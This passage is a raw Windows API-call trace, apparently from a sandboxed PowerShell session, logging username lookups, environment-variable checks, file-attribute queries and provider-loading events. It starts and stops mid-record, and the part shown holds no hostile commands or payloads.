pcbBuffer=0xcd888) returned 1 [0056.653] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c3fda8*="Alias", lpRawData=0x3c3fb38) returned 1 [0056.655] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0056.655] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.655] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7a10c0, nSize=0xcd848 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xcd848) returned 0x1 [0056.655] GetUserNameW (in: lpBuffer=0x2dc380, pcbBuffer=0xcd888 | out: lpBuffer="aETAdzjz", pcbBuffer=0xcd888) returned 1 [0056.656] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c45350*="Environment", lpRawData=0x3c450e0) returned 1 [0056.657] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0056.657] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.657] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0056.657] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0056.657] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0xcd3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0056.657] SetErrorMode (uMode=0x1) returned 0x1 [0056.657] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0xcd600 | out: lpFileInformation=0xcd600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0056.658] SetErrorMode (uMode=0x1) returned 0x1 [0056.659] GetLogicalDrives () returned 0x4 [0056.659] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcd160, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0056.660] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0056.660] SetErrorMode (uMode=0x1) returned 0x1 [0056.661] CoTaskMemAlloc (cb=0x68) returned 0x1b787e80 [0056.661] CoTaskMemAlloc (cb=0x68) returned 0x1b787ef0 [0056.661] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b787e80, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xcd5d0, lpMaximumComponentLength=0xcd5cc, lpFileSystemFlags=0xcd5c8, lpFileSystemNameBuffer=0x1b787ef0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xcd5d0*=0x705ba84c, lpMaximumComponentLength=0xcd5cc*=0xff, lpFileSystemFlags=0xcd5c8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0056.662] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcd310, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0056.662] SetErrorMode (uMode=0x1) returned 0x1 [0056.662] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd570 | out: lpFileInformation=0xcd570*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0056.662] SetErrorMode (uMode=0x1) returned 0x1 [0056.662] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcd310, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0056.662] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0056.662] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0056.663] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0056.663] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0056.663] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcd140, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0056.663] SetErrorMode (uMode=0x1) returned 0x1 [0056.663] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd3a0 | out: lpFileInformation=0xcd3a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0056.663] SetErrorMode (uMode=0x1) returned 0x1 [0056.663] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcd140, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0056.664] SetErrorMode (uMode=0x1) returned 0x1 [0056.664] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd3a0 | out: lpFileInformation=0xcd3a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0056.664] SetErrorMode (uMode=0x1) returned 0x1 [0056.664] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcd1e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0056.664] SetErrorMode (uMode=0x1) returned 0x1 [0056.664] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd440 | out: lpFileInformation=0xcd440*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0056.664] SetErrorMode (uMode=0x1) returned 0x1 [0056.664] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7a10c0, nSize=0xcd848 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xcd848) returned 0x1 [0056.665] GetUserNameW (in: lpBuffer=0x2dc380, pcbBuffer=0xcd888 | out: lpBuffer="aETAdzjz", pcbBuffer=0xcd888) returned 1 [0056.665] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c4c3a8*="FileSystem", lpRawData=0x3c4c138) returned 1 [0056.666] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0056.666] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.667] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7a10c0, nSize=0xcd848 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xcd848) returned 0x1 [0056.667] GetUserNameW (in: lpBuffer=0x2dc380, pcbBuffer=0xcd888 | out: lpBuffer="aETAdzjz", pcbBuffer=0xcd888) returned 1 [0056.667] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c51b98*="Function", lpRawData=0x3c51928) returned 1 [0056.669] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0056.669] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0056.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0056.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0056.718] CoTaskMemAlloc (cb=0x804) returned 0x1b7a10c0 [0056.718] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7a10c0, nSize=0xcd848 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xcd848) returned 0x1 [0056.718] CoTaskMemFree (pv=0x1b7a10c0) [0056.718] CoTaskMemAlloc (cb=0x204) returned 0x2dc380 [0056.718] GetUserNameW (in: lpBuffer=0x2dc380, pcbBuffer=0xcd888 | out: lpBuffer="aETAdzjz", pcbBuffer=0xcd888) returned 1 [0056.719] CoTaskMemFree (pv=0x2dc380) [0056.719] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c74370*="Registry", lpRawData=0x3c74100) returned 1 [0056.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0056.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0056.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0056.721] CoTaskMemAlloc (cb=0x804) returned 0x1b7a10c0 [0056.721] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7a10c0, nSize=0xcd848 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xcd848) returned 0x1 [0056.721] CoTaskMemFree (pv=0x1b7a10c0) [0056.721] CoTaskMemAlloc (cb=0x204) returned 0x2dc380 [0056.721] GetUserNameW (in: lpBuffer=0x2dc380, pcbBuffer=0xcd888 | out: lpBuffer="aETAdzjz", pcbBuffer=0xcd888) returned 1 [0056.721] CoTaskMemFree (pv=0x2dc380) [0056.721] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c79738*="Variable", lpRawData=0x3c794c8) returned 1 [0056.722] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0056.722] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.722] CoTaskMemFree (pv=0x32a5c0) [0056.723] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0056.723] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.723] CoTaskMemFree (pv=0x32a5c0) [0056.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0056.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0056.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0056.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0056.743] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7a10c0, nSize=0xcd848 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xcd848) returned 0x1 [0056.743] GetUserNameW (in: lpBuffer=0x2dc380, pcbBuffer=0xcd888 | out: lpBuffer="aETAdzjz", pcbBuffer=0xcd888) returned 1 [0056.744] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c8d540*="Certificate", lpRawData=0x3c8d2d0) returned 1 [0056.746] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0056.747] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.748] CoTaskMemAlloc (cb=0x20e) returned 0x1b786030 [0056.748] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b786030 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0056.749] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0056.749] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.755] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0056.755] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.757] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0056.757] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.757] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0xcd230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0056.757] SetErrorMode (uMode=0x1) returned 0x1 [0056.757] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcd490 | out: lpFileInformation=0xcd490*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xbcc623c0, ftLastAccessTime.dwHighDateTime=0x1d48db2, ftLastWriteTime.dwLowDateTime=0xbcc623c0, ftLastWriteTime.dwHighDateTime=0x1d48db2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0056.758] SetErrorMode (uMode=0x1) returned 0x1 [0056.758] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0xcd230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0056.758] SetErrorMode (uMode=0x1) returned 0x1 [0056.758] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcd490 | out: lpFileInformation=0xcd490*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xbcc623c0, ftLastAccessTime.dwHighDateTime=0x1d48db2, ftLastWriteTime.dwLowDateTime=0xbcc623c0, ftLastWriteTime.dwHighDateTime=0x1d48db2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0056.758] SetErrorMode (uMode=0x1) returned 0x1 [0056.758] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0056.758] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.762] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0xcd3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0056.762] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcd240, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0056.762] SetErrorMode (uMode=0x1) returned 0x1 [0056.763] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd450 | out: lpFileInformation=0xcd450*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0056.763] SetErrorMode (uMode=0x1) returned 0x1 [0056.763] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcd240, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0056.763] SetErrorMode (uMode=0x1) returned 0x1 [0056.763] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd450 | out: lpFileInformation=0xcd450*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0056.763] SetErrorMode (uMode=0x1) returned 0x1 [0056.763] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcd250, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0056.763] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcd140, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0056.763] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xcd240, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0056.763] SetErrorMode (uMode=0x1) returned 0x1 [0056.764] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xcd450 | out: lpFileInformation=0xcd450*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0056.764] SetErrorMode (uMode=0x1) returned 0x1 [0056.764] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xcd240, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0056.764] SetErrorMode (uMode=0x1) returned 0x1 [0056.764] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xcd450 | out: lpFileInformation=0xcd450*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0056.764] SetErrorMode (uMode=0x1) returned 0x1 [0056.764] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xcd250, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0056.764] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0xcd140, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0056.764] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0xcd240, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0056.764] SetErrorMode (uMode=0x1) returned 0x1 [0056.764] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0xcd450 | out: lpFileInformation=0xcd450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0056.764] SetErrorMode (uMode=0x1) returned 0x1 [0056.764] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0xcd240, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0056.764] SetErrorMode (uMode=0x1) returned 0x1 [0056.764] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0xcd450 | out: lpFileInformation=0xcd450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0056.765] SetErrorMode (uMode=0x1) returned 0x1 [0056.765] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0xcd250, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0056.765] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0xcd140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0056.765] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0xcd240, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0056.765] SetErrorMode (uMode=0x1) returned 0x1 [0056.765] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcd450 | out: lpFileInformation=0xcd450*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xbcc623c0, ftLastAccessTime.dwHighDateTime=0x1d48db2, ftLastWriteTime.dwLowDateTime=0xbcc623c0, ftLastWriteTime.dwHighDateTime=0x1d48db2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0056.765] SetErrorMode (uMode=0x1) returned 0x1 [0056.765] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0xcd240, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0056.765] SetErrorMode (uMode=0x1) returned 0x1 [0056.765] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcd450 | out: lpFileInformation=0xcd450*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xbcc623c0, ftLastAccessTime.dwHighDateTime=0x1d48db2, ftLastWriteTime.dwLowDateTime=0xbcc623c0, ftLastWriteTime.dwHighDateTime=0x1d48db2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0056.765] SetErrorMode (uMode=0x1) returned 0x1 [0056.765] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0xcd250, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 